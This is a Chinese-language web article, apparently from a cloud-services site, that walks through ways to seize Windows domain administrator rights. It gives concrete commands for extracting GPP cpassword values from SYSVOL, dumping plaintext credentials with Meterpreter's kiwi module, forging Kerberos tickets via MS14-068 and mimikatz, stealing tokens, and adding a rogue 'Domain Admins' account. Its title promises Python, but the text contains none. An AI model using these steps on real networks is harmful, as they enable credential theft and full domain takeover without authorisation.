您好,登錄后才能下訂單哦!
這篇文章主要介紹Python安全獲取域管理員權限的方式有哪些,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!
在大多數情況下,攻擊者可以通過定位域管理員所登錄的服務器,利用漏洞獲取服務器system權限,找到域管理的賬號、進程或是身份驗證令牌,從而獲取域管理員權限
SYSVOL是域內的共享文件夾,用來存放登錄腳本、組策略腳本等信息。當域管理員通過組策略修改密碼時,在腳本中引入用戶密碼,就可能導致安全問題。
(1)訪問SYSVOL共享文件夾,搜索包含“cpassword”的XML文件,獲取AES加密的密碼。
(2)使用kali自帶的gpp-decrypt進行破解,從而獲取域賬號密碼,直接登錄域管理員賬號獲取訪問權限。
使用kiwi模塊需要system權限,所以我們在使用該模塊之前需要將當前MSF中的shell提升為system。提到system有兩個方法,一是當前的權限是administrator用戶,二是利用其它手段先提權到administrator用戶。然后administrator用戶可以直接getsystem到system權限。
meterpreter > getuid Server username: BYPASS-E97BA3FC\Administrator meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
加載kiwi模塊
load kiwi
列舉系統中的明文密碼
creds_all
MS14068是一個能夠使普通用戶提權到域控權限的權限提升漏洞。攻擊者可以通過構造特定的請求包來達到提升權限的目的。
攻擊流程:
第一步:利用MS14-068偽造生成TGT
MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d dc.test.com
第二步:利用mimikatz將工具得到的TGT票據寫入內存,創建緩存證書
mimikatz#kerberos::ptc TGT_bypass@test.com.ccache
第三步:獲取域管理員權限。創建一個 test 賬號并加入域管理員組,從而隨時可以登錄域控主機進行操作。
PsExec.exe \\dc cmd.exe // 添加test用戶 net user test abc123! /add /domain // 把 test 用戶添加進域管理員組 net group "domain admins" test /add /domain // 查看域管理員 net group "domain admins" /domain
當有域控賬戶登陸至服務器時可使用令牌模擬進行滲透取得域控權限。
1、入侵域管理員所在的服務器,竊取域管理員的令牌,從而控制整個域。
2、直接在meterpreter shell上執行添加域管理員
add_user test abc123! -h 域控的IP地址 add_group_user "Domain Admins" test -h 域控IP地址
入侵了域管理員所登錄的服務器,將進程遷移到域管理員所運行的進程,就可以獲得域管理員權限。
1、獲取域管理員列表
net group "Domain Admins" /domain
2、利用ps找到域管理員(TEST\bypass)所運行的進程,然后將shell進程遷移到域管理員所運行的進程中,成功后就獲得了域管理員權限。如下圖所示:
3、輸入shell命令獲取OS shell,在本機上使用Windows命令添加新的域管理員:
// 添加test用戶 net user test admin@123 /add /domain // 把 test 用戶添加進域管理員組 net group "domain admins" test /add /domain
4、成功添加了域管理員賬號test。
以上是“Python安全獲取域管理員權限的方式有哪些”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注億速云行業資訊頻道!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。